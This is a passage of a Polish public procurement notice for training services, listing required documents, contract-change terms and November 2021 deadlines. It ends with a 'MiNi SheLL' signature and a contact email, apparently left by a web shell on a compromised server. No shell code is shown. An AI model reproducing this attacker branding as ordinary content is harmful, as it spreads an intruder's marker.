tych podmiotów (dotyczy Wykonawców<br/>polegających na zdolnościach lub sytuacji podmiotów udostępniających zasoby na podstawie art. 266<br/>w zw. z art. 118 ust. 3 ustawy Pzp) – wg załącznika nr 6 do SWZ</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> a) wypełniony formularz ofertowy [wg załącznika nr 1 do SWZ];b) certyfikat systemu jakości w<br/>działalności edukacyjnej zgodny z normą PN-EN ISO 9001 lub certyfikat systemu zarządzania<br/>jakością IQNet lub akredytacja kształcenia ustawicznego w formach pozaszkolnych wydana<br/>przez Kuratorium Oświaty lub równoważne – w celu przyznania punktów w kryterium oceny ofert<br/>dotyczącym posiadania przez jednostkę/instytucję szkoleniową certyfikatów jakości usług lub<br/>akredytacji prowadzonej działalności;c) dokumenty potwierdzające kwalifikacje osób<br/>wskazanych do realizacji przedmiotu zamówienia (doświadczenie, wykształcenie i uprawnienia)<br/>– w celu przyznania punktów w kryteriach oceny ofert dotyczących doświadczenia osób<br/>wyznaczonych do realizacji zamówienia, poziomu wykształcenia osób wyznaczonych do<br/>realizacji zamówienia oraz uprawnień do prowadzenia zajęć z młodzieżą (przygotowania<br/>pedagogicznego);d) pełnomocnictwo do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia w postępowaniu o udzielenie zamówienia lub do reprezentowania<br/>ich w postępowaniu oraz zawarcia umowy o udzielenie zamówienia publicznego (dotyczy spółek<br/>cywilnych, konsorcjów);e) pełnomocnictwo do podpisywania oferty lub poświadczania zgodności<br/>cyfrowego odwzorowania z dokumentem w postaci papierowej (jeżeli dotyczy) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców, którzy wspólnie ubiegają się o udzielenie zamówienia (dotyczy<br/>spółki cywilnej, konsorcjum) Zamawiający wymaga, aby ustanowili pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia lub do reprezentowania ich w<br/>postępowaniu oraz zawarcia umowy o udzielenie zamówienia publicznego (do oferty należy<br/>dołączyć stosowny dokument ustanawiający pełnomocnika np. pełnomocnictwo, umowę spółki<br/>cywilnej, umowę konsorcjum).W przypadku przedsiębiorców ubiegających się wspólnie o<br/>zamówienie (spółka cywilna, konsorcjum), przedsiębiorcy składają oddzielnie oświadczenia<br/>wymienione w rozdziale V pkt 1.1 i 1.2 SWZ. Oświadczenia te potwierdzają spełnianie warunków<br/>udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z<br/>Wykonawców wykazuje spełnianie warunków udziału w postępowaniu oraz brak podstaw<br/>wykluczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zakres potencjalnych zmian umowy został określony w paragrafie 10 wzoru umowy<br/>stanowiącego załącznik nr 7 do SWZ o następującej treści:&#34;1. Zamawiający przewiduje<br/>możliwość wprowadzenia zmian do umowy, jeżeli wystąpią następujące przesłanki:a) ulegnie<br/>zmianie ilość uczestników określona w § 6 ust. 1 umowy;b) nastąpią czasowe utrudnienia w<br/>prowadzeniu zajęć ze względu na ograniczenia wprowadzone przez władze państwowe lub<br/>samorządowe w związku ze zwalczaniem pandemii COVID-19.2. Dopuszczalne jest<br/>wprowadzanie zmian do umowy w następujących sytuacjach:a) gdy nowy Wykonawca ma<br/>zastąpić dotychczasowego Wykonawcę w wyniku sukcesji, wstępując w prawa i obowiązki<br/>Wykonawcy, w następstwie przejęcia, połączenia, podziału, przekształcenia, upadłości,<br/>restrukturyzacji, dziedziczenia lub nabycia dotychczasowego Wykonawcy lub jego<br/>przedsiębiorstwa, o ile nowy Wykonawca spełnia warunki udziału w postępowaniu skutkującym<br/>zawarciem niniejszej umowy, nie zachodzą wobec niego podstawy wykluczenia określone w<br/>postępowaniu skutkującym zawarciem niniejszej umowy oraz nie pociąga to za sobą innych<br/>istotnych zmian umowy, a także nie ma na celu uniknięcia stosowania przepisów ustawy Prawo<br/>zamówień publicznych;b) jeżeli dotyczą realizacji przez dotychczasowego Wykonawcę<br/>dodatkowych dostaw, usług lub robót budowlanych, których nie uwzględniono w zamówieniu podstawowym, o ile stały się one niezbędne i zostały spełnione łącznie następujące warunki:<br/>zmiana Wykonawcy nie może zostać dokonana z powodów ekonomicznych lub technicznych, w<br/>szczególności dotyczących zamienności lub interoperacyjności wyposażenia, usług lub instalacji<br/>zamówionych w ramach zamówienia podstawowego, zmiana Wykonawcy spowodowałaby<br/>istotną niedogodność lub znaczne zwiększenie kosztów dla Zamawiającego, wzrost ceny<br/>spowodowany każdą kolejną zmianą nie przekracza 50% wartości pierwotnej umowy, z<br/>wyjątkiem należycie uzasadnionych przypadków;c) jeżeli konieczność zmiany Umowy<br/>spowodowana jest okolicznościami, których Zamawiający, działając z należytą starannością, nie<br/>mógł przewidzieć, o ile zmiana nie modyfikuje ogólnego charakteru umowy a wzrost ceny<br/>spowodowany każdą kolejną zmianą nie przekracza 50% wartości pierwotnej umowy;d) których<br/>łączna wartość jest mniejsza niż progi unijne określone w ustawie Prawo zamówień publicznych<br/>oraz jest niższa niż 10% wartości pierwotnej umowy, a zmiany te nie powodują zmiany ogólnego<br/>charakteru umowy.3. Zmiany umowy wymagają zachowania formy pisemnej pod rygorem<br/>nieważności.4. Wniosek Wykonawcy o zmianę treści umowy w sytuacjach określonych w ust. 1<br/>lit. b) winien być zgłoszony Zamawiającemu w terminie 7 dni od momentu wystąpienia<br/>przesłanek do zmiany umowy.5. W sytuacjach określonych w ust. 2 lit. b – c, Zamawiający po<br/>dokonaniu zmiany umowy zamieszcza ogłoszenie o zmianie umowy w Biuletynie Zamówień<br/>Publicznych.&#34; <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-15 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego na miniPortalu. Sposób złożenia oferty, w tym zaszyfrowania oferty opisany został w „Instrukcji użytkownika”, dostępnej na stronie: https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-15 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-15</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com